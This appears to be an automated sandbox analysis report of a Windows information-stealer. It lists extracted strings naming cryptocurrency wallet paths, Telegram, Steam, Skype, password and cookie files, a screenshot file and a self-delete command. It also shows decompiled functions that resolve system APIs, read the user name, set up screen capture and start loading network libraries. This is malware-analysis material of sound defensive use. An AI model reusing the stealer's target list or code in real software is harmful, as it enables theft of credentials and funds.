%APPDATA%\MultiBitHD\, xrefs: 00418A6F
<d>, xrefs: 00418898
Skype, xrefs: 00418AA4
%DSK_, xrefs: 00418B71, 00418B8E, 00418C17
<, xrefs: 00419547
Coins\Ethereum, xrefs: 004189E4
image/jpeg, xrefs: 00418B01
</n>, xrefs: 00418859
"countryCode":", xrefs: 00418F66
Steam, xrefs: 00418AE7
mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml, xrefs: 00418A6A
Telegram, xrefs: 00418AC7
Coins\Electrum-LTC, xrefs: 004189BB
<P@, xrefs: 0041926A, 0041927E, 00419294, 004192B6, 004192CC, 004192EE, 00419304, 00419326, 00419352, 0041936E
%appdata%\Electrum-LTC\wallets\, xrefs: 004189C5
ip.txt, xrefs: 00418F91, 00418FA3
<info, xrefs: 00419260
%comspec%, xrefs: 00419571
%APPDATA%\Jaxx\Local Storage\, xrefs: 00418A43

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$AddressDirectoryMetricsProcSystem$ExitLibraryLoadMutexProcess
String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<P@$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
API String ID: 2865495769-212252816
Opcode ID: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
Instruction ID: 12fbeab09d86b4d4d3426c2dede24d6d64c59345960e79b613594a42cd3754e1
Opcode Fuzzy Hash: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
Instruction Fuzzy Hash: 91A21A34A002199BDB10EB55DC91BDEB7B5EF49304F5080BBF408BB291DB78AE858F59

Uniqueness

Uniqueness Score: -1.00%

Function 004065F0, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065F0(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0xff;
				_t7 = GetUserNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403BDC(_t12);
				}
				return E00403D6C(_t12, 0x100,  &_v516);
			}

0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00000000
0x00406627
0x00000000

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757

Uniqueness

Uniqueness Score: -1.00%

Function 00405668, Relevance: 217.3, APIs: 62, Strings: 62, Instructions: 307
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405668() {
				struct HINSTANCE__* _t108;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t112;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t115;
				struct HINSTANCE__* _t118;
				_Unknown_base(*)()* _t119;

				 *0x41c678 = LoadLibraryA("kernel32.dll");
				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
				 *0x41c6b0 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
				 *0x41c6b4 = GetProcAddress( *0x41c678, "FindFirstFileW");
				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindNextFileW");
				 *0x41c6bc = GetProcAddress( *0x41c678, "LocalFree");
				 *0x41c6c0 = GetProcAddress( *0x41c678, "GetTickCount");
				 *0x41c6c4 = GetProcAddress( *0x41c678, "CopyFileW");
				 *0x41c6c8 = GetProcAddress( *0x41c678, "FindClose");
				 *0x41c6cc = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
				 *0x41c6d0 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
				 *0x41c6d4 = GetProcAddress( *0x41c678, "Process32FirstW");
				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32NextW");
				 *0x41c6dc = GetProcAddress( *0x41c678, "GetModuleFileNameW");
				 *0x41c6e0 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
				 *0x41c6e4 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocalTime");
				 *0x41c6ec = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
				 *0x41c6f0 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
				 *0x41c6f4 = GetProcAddress( *0x41c678, "DeleteFileW");
				 *0x41c6f8 = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
				 *0x41c6fc = GetProcAddress( *0x41c678, "GetDriveTypeA");
				 *0x41c700 = GetProcAddress( *0x41c678, "CreateProcessW");
				 *0x41c704 = LoadLibraryA("advapi32.dll");
				 *0x41c708 = GetProcAddress( *0x41c704, "GetUserNameW");
				 *0x41c70c = GetProcAddress( *0x41c704, "RegCreateKeyExW");
				 *0x41c710 = GetProcAddress( *0x41c704, "RegQueryValueExW");
				 *0x41c714 = GetProcAddress( *0x41c704, "RegCloseKey");
				 *0x41c718 = GetProcAddress( *0x41c704, "RegOpenKeyExW");
				 *0x41c71c = GetProcAddress( *0x41c704, "AllocateAndInitializeSid");
				 *0x41c720 = GetProcAddress( *0x41c704, "LookupAccountSidA");
				 *0x41c724 = GetProcAddress( *0x41c704, "CreateProcessAsUserW");
				 *0x41c728 = GetProcAddress( *0x41c704, "CheckTokenMembership");
				 *0x41c72c = GetProcAddress( *0x41c704, "RegOpenKeyW");
				 *0x41c730 = GetProcAddress( *0x41c704, "RegEnumKeyW");
				 *0x41c734 = GetProcAddress( *0x41c704, "RegEnumValueW");
				 *0x41c738 = GetProcAddress( *0x41c704, "CryptAcquireContextA");
				 *0x41c73c = GetProcAddress( *0x41c704, "CryptCreateHash");
				 *0x41c740 = GetProcAddress( *0x41c704, "CryptHashData");
				 *0x41c744 = GetProcAddress( *0x41c704, "CryptGetHashParam");
				 *0x41c748 = GetProcAddress( *0x41c704, "CryptDestroyHash");
				 *0x41c74c = GetProcAddress( *0x41c704, "CryptReleaseContext");
				 *0x41c750 = LoadLibraryA("user32.dll");
				_t108 =  *0x41c750; // 0x745c0000
				 *0x41c754 = GetProcAddress(_t108, "EnumDisplayDevicesW");
				_t110 =  *0x41c750; // 0x745c0000
				 *0x41c758 = GetProcAddress(_t110, "wvsprintfA");
				_t112 =  *0x41c750; // 0x745c0000
				 *0x41c75c = GetProcAddress(_t112, "GetKeyboardLayoutList");
				_t114 = LoadLibraryA("shell32.dll"); // executed
				 *0x41c760 = _t114;
				_t115 =  *0x41c760; // 0x750f0000
				 *0x41c764 = GetProcAddress(_t115, "ShellExecuteExW");
				 *0x41c768 = LoadLibraryA("ntdll.dll");
				_t118 =  *0x41c768; // 0x770b0000
				_t119 = GetProcAddress(_t118, "RtlComputeCrc32");
				 *0x41c76c = _t119;
				return _t119;
			}

0x0040567e
0x0040568d
0x0040569f
0x004056b1
0x004056c3
0x004056d5
0x004056e7
0x004056f9
0x0040570b
0x0040571d
0x0040572f
0x00405741
0x00405753
0x00405765
0x00405777
0x00405789
0x0040579b
0x004057ad
0x004057bf
0x004057d1
0x004057e3
0x004057f5
0x00405807
0x00405819
0x0040582b
0x0040583d
0x0040584f
0x00405861
0x00405873
0x00405885
0x00405897
0x004058a9
0x004058bb
0x004058cd
0x004058df
0x004058ee
0x004058fd
0x0040590f
0x00405921
0x00405933
0x00405945
0x00405957
0x00405969
0x0040597b
0x0040598d
0x0040599f
0x004059b1
0x004059c3
0x004059d5
0x004059e7
0x004059f9
0x00405a0b
0x00405a1d
0x00405a2f
0x00405a3e
0x00405a48
0x00405a53
0x00405a5d
0x00405a68
0x00405a72
0x00405a7d
0x00405a87
0x00405a8c
0x00405a96
0x00405aa1
0x00405ab0
0x00405aba
0x00405ac0
0x00405ac5
0x00405acc

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418711), ref: 00405679
GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
GetProcAddress.KERNEL32(745C0000,EnumDisplayDevicesW), ref: 00405A4E
GetProcAddress.KERNEL32(745C0000,wvsprintfA), ref: 00405A63
GetProcAddress.KERNEL32(745C0000,GetKeyboardLayoutList), ref: 00405A78
LoadLibraryA.KERNEL32(shell32.dll,745C0000,GetKeyboardLayoutList,745C0000,wvsprintfA,745C0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
GetProcAddress.KERNEL32(750F0000,ShellExecuteExW), ref: 00405A9C
LoadLibraryA.KERNEL32(ntdll.dll,750F0000,ShellExecuteExW,shell32.dll,745C0000,GetKeyboardLayoutList,745C0000,wvsprintfA,745C0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
GetProcAddress.KERNEL32(770B0000,RtlComputeCrc32), ref: 00405AC0

Strings

RegOpenKeyW, xrefs: 00405992
RegOpenKeyExW, xrefs: 00405938
CreateProcessAsUserW, xrefs: 0040596E
SetCurrentDirectoryW, xrefs: 0040576A
CopyFileW, xrefs: 004057C4
RemoveDirectoryW, xrefs: 0040588A
LookupAccountSidA, xrefs: 0040595C
shell32.dll, xrefs: 00405A82
ReleaseMutex, xrefs: 00405722
LocalFree, xrefs: 004057A0
RegEnumValueW, xrefs: 004059B6
user32.dll, xrefs: 00405A34
DeleteFileW, xrefs: 0040589C
CryptCreateHash, xrefs: 004059DA
CryptAcquireContextA, xrefs: 004059C8
GetTimeZoneInformation, xrefs: 00405878
GetFileSize, xrefs: 004056C8
GetLogicalDriveStringsA, xrefs: 004058AE
SetDllDirectoryW, xrefs: 00405842
GetKeyboardLayoutList, xrefs: 00405A6D
GlobalMemoryStatus, xrefs: 004056A4
GlobalMemoryStatusEx, xrefs: 004057E8
RegCreateKeyExW, xrefs: 00405902
advapi32.dll, xrefs: 004058E4
RegEnumKeyW, xrefs: 004059A4
FindClose, xrefs: 004057D6
CloseHandle, xrefs: 004056DA
CryptDestroyHash, xrefs: 00405A10
GetLastError, xrefs: 00405734
GetTickCount, xrefs: 004057B2
GetDriveTypeA, xrefs: 004058C0
SetEnvironmentVariableW, xrefs: 00405758
CreateMutexA, xrefs: 00405710
CryptHashData, xrefs: 004059EC
CryptReleaseContext, xrefs: 00405A22
GetUserNameW, xrefs: 004058F0
GetModuleFileNameW, xrefs: 00405830
CreateToolhelp32Snapshot, xrefs: 004057FA
RegCloseKey, xrefs: 00405926
ShellExecuteExW, xrefs: 00405A91
RegQueryValueExW, xrefs: 00405914
RtlComputeCrc32, xrefs: 00405AB5
CreateProcessW, xrefs: 004058D2
kernel32.dll, xrefs: 00405674
FindFirstFileW, xrefs: 0040577C
wvsprintfA, xrefs: 00405A58
CryptGetHashParam, xrefs: 004059FE
GetFileAttributesW, xrefs: 004056FE
Process32FirstW, xrefs: 0040580C
GetLocaleInfoA, xrefs: 00405854
ntdll.dll, xrefs: 00405AA6
FindNextFileW, xrefs: 0040578E
GetCurrentDirectoryW, xrefs: 00405746
Process32NextW, xrefs: 0040581E
GetLocalTime, xrefs: 00405866
GetComputerNameW, xrefs: 00405692
CheckTokenMembership, xrefs: 00405980
EnumDisplayDevicesW, xrefs: 00405A43
ExpandEnvironmentStringsW, xrefs: 00405680
AllocateAndInitializeSid, xrefs: 0040594A
CreateFileW, xrefs: 004056B6
ReadFile, xrefs: 004056EC

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
API String ID: 2238633743-3531362093
Opcode ID: 9660b240828e0248fa2e1cbcae2f49e551ae518504ec0fd7e682362848f263d4
Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
Opcode Fuzzy Hash: 9660b240828e0248fa2e1cbcae2f49e551ae518504ec0fd7e682362848f263d4
Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C

Uniqueness

Uniqueness Score: -1.00%

Function 00417216, Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417216() {
				void* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t21;

				 *0x41cb2c =  *0x41cb2c - 1;
				if( *0x41cb2c < 0) {
					_t2 = LoadLibraryA("crtdll.dll"); // executed
					 *0x41cb04 = GetProcAddress(_t2, "wcscmp");
					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
					 *0x41cb08 = GetProcAddress(_t4, "GdiplusStartup");
					 *0x41cb0c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
					 *0x41cb10 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
					 *0x41cb14 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
					 *0x41cb18 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
					 *0x41cb1c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
					 *0x41cb20 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
					 *0x41cb24 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
					 *0x41cb28 = _t21;
					return _t21;
				}
				return _t1;
			}

0x00417218
0x0041721f
0x0041722f
0x0041723a
0x00417249
0x00417254
0x0041726e
0x00417288
0x004172a2
0x004172bc
0x004172d6
0x004172f0
0x0041730a
0x0041731f
0x00417324
0x00000000
0x00417324
0x00417329

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041722F
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417235
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417249
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041724F
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417263
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417269
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041727D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417283
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417297
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041729D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172B1
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172B7
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172CB
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 004172E5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172EB
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 004172FF
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417305
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417319
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041731F

Strings

wcscmp, xrefs: 00417225
CreateStreamOnHGlobal, xrefs: 004172F5
GdipDisposeImage, xrefs: 004172C1
GdiplusShutdown, xrefs: 00417259
GdiplusStartup, xrefs: 0041723F
GdipCreateBitmapFromHBITMAP, xrefs: 00417273
GdipSaveImageToStream, xrefs: 004172DB
ole32.dll, xrefs: 004172FA, 00417314
GdipGetImageEncoders, xrefs: 004172A7
GdipGetImageEncodersSize, xrefs: 0041728D
GetHGlobalFromStream, xrefs: 0041730F
Gdiplus.dll, xrefs: 00417244, 0041725E, 00417278, 00417292, 004172AC, 004172C6, 004172E0
crtdll.dll, xrefs: 0041722A

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: 3bc6c4118995df7160033985ba2e072cd86b9b17629d2e708302bb0f3277f80d
Instruction ID: 88d1ed536910c73cd15d425763909c73792c0e606fd49294d8ff60234fce0fcb
Opcode Fuzzy Hash: 3bc6c4118995df7160033985ba2e072cd86b9b17629d2e708302bb0f3277f80d
Instruction Fuzzy Hash: BD11EDF16D8304B5C60077F2FD47ADA26657645709361453BBE10B20E2D57C6881A69D

Uniqueness

Uniqueness Score: -1.00%

Function 00417D84, Relevance: 38.9, APIs: 16, Strings: 6, Instructions: 375
libraryloadernetworkCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00417D84(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				char _v73;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v132;
				char _v388;
				char _v516;
				char _v644;
				char _v2692;
				char _v3716;
				char _v3776;
				char _v69412;
				char _v69416;
				char _v69420;
				char _v69424;
				char _v69428;
				char _v69432;
				char _v69436;
				char _v69440;
				void* __ecx;
				long _t223;
				long _t290;
				void* _t304;
				struct HINSTANCE__* _t322;
				struct HINSTANCE__* _t326;
				void* _t327;
				intOrPtr _t329;
				intOrPtr _t353;
				void* _t362;
				struct _SYSTEMTIME _t373;
				intOrPtr* _t375;
				intOrPtr _t377;
				intOrPtr _t378;
				char _t393;

				_t377 = _t378;
				_t329 = 0x21e7;
				do {
					_push(0);
					_push(0);
					_t329 = _t329 - 1;
				} while (_t329 != 0);
				_t1 =  &_v8;
				 *_t1 = _t329;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				_t373 =  &_v3776;
				_push(_t377);
				_push(0x418292);
				_push( *[fs:eax]);
				 *[fs:eax] = _t378;
				if(_v16 == 0) {
					E0040357C( &_v16, 0x4182ac);
				}
				E004034E4( &_v92);
				E0040357C( &_v56, _v8);
				_v73 = 0;
				E0040357C( &_v52, "wininet.dll");
				_t326 = GetModuleHandleA(E004039E8( &_v52));
				if(_t326 == 0) {
					_t322 = LoadLibraryA(E004039E8( &_v52)); // executed
					_t326 = _t322;
				}
